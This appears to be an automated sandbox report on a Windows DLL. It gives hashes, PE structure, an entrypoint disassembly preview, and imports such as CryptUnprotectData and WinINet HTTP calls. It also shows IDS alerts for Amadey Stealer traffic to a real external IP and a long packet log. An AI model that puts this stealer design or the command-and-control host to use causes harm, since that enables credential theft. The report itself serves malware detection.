                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ve33hvrb.xqi.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wi253m0n.y1v.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yx3tmf5u.1uy.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              Static File Info

                                              General

                                              File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Entropy (8bit):6.464842710090692
                                              TrID:
                                              • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                              • Win64 Executable (generic) (12005/4) 10.17%
                                              • Generic Win/DOS Executable (2004/3) 1.70%
                                              • DOS Executable Generic (2002/1) 1.70%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                              File name:mU3Ob2XcCt.dll
                                              File size:1'267'200 bytes
                                              MD5:af03a0d9fbfcafefa431092f93d37f01
                                              SHA1:6b7295a441a3d79f60614af75fe70569f48d10ac
                                              SHA256:d039144af15395af18d802e15aaac97ed9521329c33c5f1798412992fc26daff
                                              SHA512:1054c651cd55455b66fce8008646928d44a083e1008669c4529cb8ab0e0435c31518b627f2756ede3179a2607523a3ee5b7624796275d0e86ebd218c07cf7cc9
                                              SSDEEP:24576:ysd+7fzBMqZjh2sntUcCy8LfunZzW8IFHcDVhc/hHAO:y3BHjh2OZ80ZzHIF85u
                                              TLSH:3D457D0BA26641BCD4BBE1789A275A47F775704603705AEB07E046A63F13FE19EBE310
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........D................................s.............................................................X.............Rich...........

                                              File Icon

                                              Icon Hash:7ae282899bbab082

                                              Static PE Info

                                              General

                                              Entrypoint:0x1800cd9e4
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x180000000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0x671CF636 [Sat Oct 26 14:01:26 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:6
                                              OS Version Minor:0
                                              File Version Major:6
                                              File Version Minor:0
                                              Subsystem Version Major:6
                                              Subsystem Version Minor:0
                                              Import Hash:9227c7c1cd406670b52768efa2eb5e71

                                              Entrypoint Preview

                                              Instruction
                                              dec eax
                                              mov dword ptr [esp+08h], ebx
                                              dec eax
                                              mov dword ptr [esp+10h], esi
                                              push edi
                                              dec eax
                                              sub esp, 20h
                                              dec ecx
                                              mov edi, eax
                                              mov ebx, edx
                                              dec eax
                                              mov esi, ecx
                                              cmp edx, 01h
                                              jne 00007F02B4EF93C7h
                                              call 00007F02B4EF9728h
                                              dec esp
                                              mov eax, edi
                                              mov edx, ebx
                                              dec eax
                                              mov ecx, esi
                                              dec eax
                                              mov ebx, dword ptr [esp+30h]
                                              dec eax
                                              mov esi, dword ptr [esp+38h]
                                              dec eax
                                              add esp, 20h
                                              pop edi
                                              jmp 00007F02B4EF9254h
                                              int3
                                              int3
                                              int3
                                              dec eax
                                              and dword ptr [ecx+10h], 00000000h
                                              dec eax
                                              lea eax, dword ptr [0002E118h]
                                              dec eax
                                              mov dword ptr [ecx+08h], eax
                                              dec eax
                                              lea eax, dword ptr [0002E0FDh]
                                              dec eax
                                              mov dword ptr [ecx], eax
                                              dec eax
                                              mov eax, ecx
                                              ret
                                              int3
                                              int3
                                              dec eax
                                              sub esp, 48h
                                              dec eax
                                              lea ecx, dword ptr [esp+20h]
                                              call 00007F02B4EF9397h
                                              dec eax
                                              lea edx, dword ptr [00056C07h]
                                              dec eax
                                              lea ecx, dword ptr [esp+20h]
                                              call 00007F02B4EFB8D6h
                                              int3
                                              dec eax
                                              mov dword ptr [esp+10h], ebx
                                              dec eax
                                              mov dword ptr [esp+18h], esi
                                              push edi
                                              dec eax
                                              sub esp, 10h
                                              xor eax, eax
                                              xor ecx, ecx
                                              cpuid
                                              inc esp
                                              mov eax, ecx
                                              inc ebp
                                              xor ebx, ebx
                                              inc esp
                                              mov ecx, ebx
                                              inc ecx
                                              xor eax, 6C65746Eh
                                              inc ecx
                                              xor ecx, 756E6547h
                                              inc esp
                                              mov edx, edx
                                              mov esi, eax
                                              xor ecx, ecx
                                              inc ecx
                                              lea eax, dword ptr [ebx+01h]
                                              inc ebp
                                              or ecx, eax
                                              cpuid
                                              inc ecx
                                              xor edx, 49656E69h
                                              mov dword ptr [esp], eax
                                              inc ebp

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x124aa00x58.rdata
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x124af80x8c.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x13e0000xf8.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1320000xaca4.pdata
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x13f0000x126c.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x1163100x70.rdata
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x1163800x138.rdata
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0xfb0000x5f8.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000xf96300xf98008f9c0ac2b32282167aca4804a84121e6False0.5018249389403807data6.448452879163658IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rdata0xfb0000x2afa60x2b00002e863bd0ce9fee5400cec3b3aa8ad2bFalse0.44249068859011625data5.685478696436041IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x1260000xbb6c0x440030ab4fddae8bcbdd89d83dfd129dee88False0.11868106617647059DOS executable (block device driver \322f\324\377\3772)2.146991370344008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .pdata0x1320000xaca40xae00b36c5a23a53b995af69c6e7adda1e1e0False0.4608477011494253data6.047016256608423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              _RDATA0x13d0000xfc0x200ba87846469bab0b3d3194d351edd3c60False0.314453125data2.4292183064480657IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x13e0000xf80x2000abef1e5ed1f7934a4d9a44716e7e06bFalse0.3359375data2.5312981004807127IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc0x13f0000x126c0x1400c4f6e6a3eb36389421a452033b24bcb8False0.4271484375data5.295572321374742IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_MANIFEST0x13e0600x91XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.8689655172413793

                                              Imports

                                              DLLImport
                                              CRYPT32.dllCryptUnprotectData
                                              KERNEL32.dllGetFullPathNameA, SetEndOfFile, UnlockFileEx, GetTempPathW, CreateMutexW, WaitForSingleObject, CreateFileW, GetFileAttributesW, GetCurrentThreadId, UnmapViewOfFile, HeapValidate, HeapSize, MultiByteToWideChar, Sleep, GetTempPathA, FormatMessageW, GetDiskFreeSpaceA, GetLastError, GetFileAttributesA, GetFileAttributesExW, OutputDebugStringW, CreateFileA, LoadLibraryA, WaitForSingleObjectEx, DeleteFileA, DeleteFileW, HeapReAlloc, CloseHandle, GetSystemInfo, LoadLibraryW, HeapAlloc, HeapCompact, HeapDestroy, UnlockFile, GetProcAddress, CreateFileMappingA, LocalFree, LockFileEx, GetFileSize, DeleteCriticalSection, GetCurrentProcessId, GetProcessHeap, SystemTimeToFileTime, FreeLibrary, WideCharToMultiByte, GetSystemTimeAsFileTime, GetSystemTime, FormatMessageA, CreateFileMappingW, MapViewOfFile, QueryPerformanceCounter, GetTickCount, FlushFileBuffers, SetHandleInformation, FindFirstFileA, Wow64DisableWow64FsRedirection, K32GetModuleFileNameExW, FindNextFileA, CreatePipe, PeekNamedPipe, lstrlenA, FindClose, GetCurrentDirectoryA, lstrcatA, OpenProcess, SetCurrentDirectoryA, CreateToolhelp32Snapshot, ProcessIdToSessionId, CopyFileA, Wow64RevertWow64FsRedirection, Process32NextW, Process32FirstW, CreateThread, CreateProcessA, CreateDirectoryA, WriteConsoleW, InitializeCriticalSection, LeaveCriticalSection, LockFile, OutputDebugStringA, GetDiskFreeSpaceW, WriteFile, GetFullPathNameW, EnterCriticalSection, HeapFree, HeapCreate, TryEnterCriticalSection, ReadFile, AreFileApisANSI, SetFilePointer, ReadConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleOutputCP, SetEnvironmentVariableW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetCommandLineA, GetOEMCP, GetACP, IsValidCodePage, FindNextFileW, FindFirstFileExW, SetStdHandle, GetCurrentDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, InitializeSListHead, LCMapStringEx, InitializeCriticalSectionEx, EncodePointer, DecodePointer, CompareStringEx, GetCPInfo, GetStringTypeW, RtlUnwindEx, RtlPcToFileHeader, RaiseException, InterlockedFlushSList, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ExitProcess, GetModuleFileNameW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetStdHandle
                                              ADVAPI32.dllRegQueryValueExA, RegEnumValueW, RegEnumKeyA, RegCloseKey, RegQueryInfoKeyW, RegOpenKeyA, RegOpenKeyExA, GetSidSubAuthorityCount, GetSidSubAuthority, GetUserNameA, RegEnumKeyExW, LookupAccountNameA, GetSidIdentifierAuthority
                                              SHELL32.dllSHGetFolderPathA, SHFileOperationA
                                              WININET.dllHttpOpenRequestA, InternetWriteFile, InternetReadFile, InternetConnectA, HttpSendRequestA, InternetCloseHandle, InternetOpenA, HttpAddRequestHeadersA, HttpSendRequestExW, HttpEndRequestA, InternetOpenW
                                              bcrypt.dllBCryptOpenAlgorithmProvider, BCryptSetProperty, BCryptGenerateSymmetricKey, BCryptDecrypt

                                              Exports

                                              NameOrdinalAddress
                                              Main10x1800bdc00
                                              Save20x180005690

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Suricata IDS Alerts

                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                              2024-10-26T19:13:44.951158+02002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449731185.215.113.21780TCP
                                              2024-10-26T19:13:44.968578+02002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449730185.215.113.21780TCP
                                              2024-10-26T19:13:51.880222+02002855239ETPRO MALWARE Win32/Amadey Stealer Activity M4 (POST)1192.168.2.449732185.215.113.21780TCP

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 26, 2024 19:13:43.934741974 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:43.934950113 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:43.940370083 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:13:43.940407991 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:13:43.940505981 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:43.940531969 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:43.940629959 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:43.940712929 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:43.945930958 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:13:43.946177006 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:13:44.949290037 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:13:44.951158047 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:44.968461037 CEST8049730185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:13:44.968578100 CEST4973080192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:50.822554111 CEST4973280192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:50.828562975 CEST8049732185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:13:50.828696012 CEST4973280192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:50.828938961 CEST4973280192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:13:50.834589005 CEST8049732185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:13:51.880073071 CEST8049732185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:13:51.880222082 CEST4973280192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716114044 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716209888 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716209888 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716331959 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716373920 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716408014 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716456890 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716456890 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716531038 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716553926 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716634035 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716800928 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716861010 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716861010 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716861010 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716861010 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716861010 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716861010 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716906071 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.716933012 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717010975 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717041969 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717042923 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717042923 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717081070 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717088938 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717153072 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717153072 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717222929 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717586040 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717643976 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717643976 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717700005 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717700005 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717747927 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717747927 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717803001 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717803001 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717977047 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.717977047 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718071938 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718101025 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718137026 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718208075 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718255997 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718255997 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718326092 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718359947 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718421936 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718421936 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718529940 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718652010 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718697071 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718735933 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718735933 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718765974 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718858004 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.718974113 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719028950 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719028950 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719141960 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719141960 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719209909 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719235897 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719284058 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719341040 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719367027 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719408035 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719429970 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719441891 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719481945 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719656944 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719685078 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719736099 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719736099 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719785929 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719785929 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719835043 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719835043 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719952106 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719995975 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.719995975 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720068932 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720108032 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720132113 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720213890 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720264912 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720264912 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720295906 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720388889 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720388889 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720437050 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720437050 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720464945 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720649004 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720676899 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720726967 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720726967 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720768929 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720791101 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720802069 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720865011 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720865011 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.720969915 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721029043 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721029043 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721106052 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721137047 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721173048 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721256971 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721256971 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721327066 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721375942 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721417904 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721417904 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721491098 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721631050 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721662998 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721709967 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721709967 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721734047 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721786022 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721786022 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721837044 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721837044 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721889973 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721889973 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.721999884 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.722065926 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.722065926 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.722110033 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722140074 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.722158909 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722188950 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722204924 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.722217083 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722249031 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722276926 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722306013 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722332954 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722349882 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.722349882 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.722382069 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722412109 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722439051 CEST4973180192.168.2.4185.215.113.217
                                              Oct 26, 2024 19:14:06.722454071 CEST8049731185.215.113.217192.168.2.4
                                              Oct 26, 2024 19:14:06.722489119 CEST8049731185.215.113.217192.168.2.4
